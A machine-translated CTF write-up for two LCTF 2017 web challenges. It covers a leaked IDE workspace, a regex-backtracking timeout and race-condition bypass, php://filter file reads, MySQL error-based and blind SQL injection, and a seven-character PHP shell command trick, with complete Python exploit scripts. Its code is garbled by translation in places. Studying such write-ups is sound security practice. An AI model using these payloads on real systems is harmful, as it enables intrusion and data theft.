LCTF-2017-WEB-WP (Continuous update)

"1" Meng Meng Application system

Topic tips Using the IDE developed the registration system, about the use of things phpstorm, using tools to sweep a bit

We find that there is an. idea file leak, view. Idea/workspace.xml source can be found Xdcms2333.zip

Download down to extract the source code, here I locate several key codes:

Register.php$sth = $pdo->prepare (' INSERT into users (username, password) VALUES (: username,:p assword) '); $sth Execute ([': username ' = $username, ':p assword ' + $password]); Preg_match ('/^ (xdsec) ((?: ###|*)) $/i ', $code, $matches); if (count ($matches) = = = 3 && $admin = = = $matches [0]) {
    $sth = $pdo->prepare (' INSERT into identities (username, identity) VALUES (: Username,: Identity) ');    $sth->execute ([': Username ' + $username, ': Identity ' = $matches [1]]);} else {    $sth = $pdo->prepare (' INSERT into identities (username, identity) VALUES (: Username, "Guest");    $sth->execute ([': username ' = $username]);}

　　

Login.php$sth = $pdo->prepare (' SELECT password from users WHERE username =: username '); $sth->execute ([': Username ' = + $username]); if ($sth->fetch () [0]!== $password) {die    (' wrong password ');} $_session[' username ' = $username; unset ($_session[' is_logined ']); unset ($_session[' is_guest ']);

　　

/member.phpif (isset ($_session[' username ') = = = = False) {die    (' please login First ');} $sth = $pdo->prepare (' SELECT identity from identities WHERE username =: username '); $sth->execute ([': username ' = > $_session[' username ']); if ($sth->fetch () [0] = = = ' Guest ') {    $_session[' is_guest '] = true;}. $_session[' is_logined ' = True;if (isset ($_session[' is_logined ']) = = = False | | isset ($_session[' is_guest ')) = = = True) { c2/>}else{    if (isset ($_get[' file ') ===false)        echo "None";    ElseIf (is_file ($_get[' file '))        echo "You cannot give me a file";    else        ReadFile ($_get[' file ');}

It is easy to see that the authentication of the account password is separate from the authentication of the identity, and the authentication of the identity in member is that the query successfully extracts the data. And

$sth->fetch () [0] = = = ' GUEST '

So you can bypass validation even if no query is successful.

The focus of essay is

Preg_match ('/^ (xdsec) ((?: ###|*)) $/i ', $code, $matches);

Preg_match there is a greedy match, then we can feed it an extra long string to eat, causing Pre_match to consume a lot of resources and cause PHP to time out, the subsequent PHP statement will not be executed. This bypasses the first layer.

The second layer can bypass PHP is_file by using pseudo-protocol, and then read the config.php in this directory to get flag. Paste my own one of the py script:

#coding: utf-8#auther:ur10serimport  requestsurl = ' http://123.206.120.239/' log = ' login.php ' reg = ' register.php ' s = Requests.session () headers = {"User-agent": "mozilla/5.0" (Macintosh; Intel Mac OS X 10_11_1) applewebkit/601.2.7 (khtml, like Gecko) version/9.0.1 safari/601.2.7 ",          " Content-type ":" Appli cation/x-www-form-urlencoded "}data = {    ' to ': ' Reg ',    ' do ': ' 0 ',    ' username ': ' ur10ser ',    ' password ': ' Ur10ser ',    ' code ': ' xdsec### ' + ' AAA ' *50000}data1 = {    ' to ': ' Log ',    ' username ': ' ur10ser ',    ' password ': ' Ur10ser '}URL1 = Url+regurl2 = Url+logs.post (url1,headers=headers,data=data) print ' [+] registration successful! ' S.post (url2,data=data1) print ' [+] login successful! ' r = S.get (' http://123.206.120.239/member.php?file=php://filter/resource=config.php ') print r.content

Run results

Next, we will talk about the non-expected solution of this problem--conditional competition.

Because authentication is

if ($sth->fetch () [0] = = = ' Guest ')

Then if there is no username this row of data in the Identities table, then take out $sth->fetch () [0] The result is null, or can bypass the first layer, so you can use Python multi-threaded registered users, in

$sth = $pdo->prepare (' INSERT into identities (username, identity) VALUES (: Username,: Identity) ');

The first layer can be bypassed before the statement is executed.

The following is affixed to the conditions of the Au1ge teacher to compete script

#!/usr/bin/python#-*-coding:utf-8-*-import requestsimport reimport uuidimport threadingurl = "http://123.206.120.239 /register.php "URL1 =" http://123.206.120.239/login.php "URL2 =" http://123.206.120.239/index.php "URL3 =" http// 123.206.120.239/member.php?file=php://filter/resource=config.php "username =" "session =" "Proxies={' http ': '// 127.0.0.1:8080 '}def sess (): R = Requests.get (URL1) m = Re.search (' phpsessid= (. *?); ', r.headers[' Set-cookie ']) if M : Return str (M.group (1)) def regist (): Global username,session while true:data = {' To ': ' Re G ', ' username ': username, ' password ': ' 1 ', ' Code ': ' Xdsec ' + ' # # ' *5000} CO  Okie = {' Phpsessid ': session} r = Requests.post (URL, Data=data, cookies=cookie,stream=true) def Login (): Global username,session while true:data1 = {' username ': username, ' passwor        d ': ' 1 ', ' to ': ' Log '} cookie1 = {' Phpsessid ': session} r1 = Requests.post (Url1, Data=data1, Cookies=cookie1 Content = r1.content if ' None ' in content:print content print "Login:" + username  + '-' + Session # Print R1.text # return username = str (UUID.UUID4 ()) [: +] session = Sess () def Read (): Global username,session while true:cookie2 = {' Phpsessid ': Session} R=r Equests.get (url3,cookies=cookie2) if ' php ' in r.text:print r.textusername = str (UUID.UUID4 ()) [: 16]sessi On = Sess () def main (): threadpool=[] for N in Xrange (ten): th = Threading. Thread (Target=login) Th.setdaemon (True) threadpool.append (TH) for n in Xrange (ten): th = Threading. Thread (target=regist) Th.setdaemon (True) threadpool.append (TH) for n in Xrange (ten): th = Threading . Thread (target=read) Th.setdaemon (True) threadPool.append (TH) for th in Threadpool:th.start () for th in threadpool:threading. Thread.Join (TH) if __name__ = = ' __main__ ': Main ()

Reflection: At first it was a super long string in BP structure to feed to Preg_match, and BP was strong without a card to die. Later, a master uses BP's intruder. The specific action is

1.burpsuite Intruder Infinite Post login.php login operation 2.burpsuite Intruder Unlimited get member.php3. Register an account in front of all two running cases

The three action cookie must be the same, 1 and 3 of the account password to the same, so that the registration at the same time to complete the login operation and access to member and bypass identity detection can execute the next part of the code. can use

? file=./x/. /config.php

Read any file.

"2" What's their secret?

Do this problem really is the thinking rigid, feel oneself usually learn too silly, don't know extrapolate--!

Topic Tips

1.entrance.php2.there is no need to scan and brute force!3.hacking for fun!

Enter the entrance.php test found that there is SQL injection, but schema,information,column such as the names of the name field can be filtered, but it is impossible for the author to let you explode these names.

Easily get the library name. It is easy to think of using error injection, refer to https://dev.mysql.com/doc/refman/5.5/en/func-op-summary-ref.html. Found under Fuzz

Multipolygon (ID) multilinestring (ID) linestring (ID) geometrycollection (ID) MultiPoint (ID) polugon (ID)

These functions can be used for error injection, and after each test, it is found that only linestring (ID) can be used. We can use it to explode the table name, submit pro_id=1 and linestring (pro_id)

Then find a way to get the PRODUCT_2017CTF field name,

Pro_id=1 Union SELECT * FROM (SELECT * from PRODUCT_2017CTF as A join PRODUCT_2017CTF as B using (Pro_name)) as C
Get the next column pro_name, continue to error
Pro_id=0 and (SELECT * from YOUCANNEVERFINDME17.PRODUCT_2017CTF a join YOUCANNEVERFINDME17.PRODUCT_2017CTF b using (Pro_id,pro_name)) c)
Continue to get owner
Finally get d067a0fa9dc61a6e

D067A0FA9DC61A6E is filtered here, there are two ways

"1" If you want to isolate the content without the field name, combine a virtual table with the current table, payload:

Pro_id=-1 Union Select 1,a.4,3,4 from (select 1,2,3,4 from dual Union SELECT * from PRODUCT_2017CTF) a limit 3, 1;

"2" Using the order by blind, here I quote P Bull's script, the order by blind specific can be Baidu by itself.

#-*-Coding:utf8-*-__author__= ' [email protected] ' import requestsimport timeimport string def foo ():    url=r '/http 182.254.246.93/entrance.php '    mys=requests.session ()    x= "3 union distinct select 1,2,3,0x%s  ORDER BY 4 desc "    Cset=string.maketrans (", ") [33:127] pwd=" while    True:        try: For I in            cset:                myd={' pro_id ': x% (Pwd+i). Encode (' Hex ')}                res=mys.post (url,data=myd). Content                if ' nextentrance ' not in res:                    pwd+= Chr (Ord (i)-1)                    print pwd                    break                pass            time.sleep (0.01)        except:            print ' _ _ '            Time.sleep (0.5)        pass     Pass if __name__ = = ' __main__ ':    foo ()    print ' OK '

With tip, we got the address of the next entry.

The content is found to be limited to 7 characters, and is not a simple pre-paragraph limit.

FileName    content bash      random bb        7 characters characters Command z.php     <?= ' * ';

The <?= ' * ' in z.php, just seven characters, can be accessed to list all the files in the current directory in alphabetical order and then execute. Once the above 3 files are passed, the current folder will have 4 files, sorted alphabetically by the following

bash BB index.html (original title) z.php

After accessing z.php, the equivalent of executing bash BB index.php z.php


The contents of BB are LS/and cat/3*, respectively.

Actually can Getshell, but have not thought this method simple. Youdao original problem analysis is very clear http://www.vuln.cn/6016

LCTF-2017-WEB-WP (Continuous update)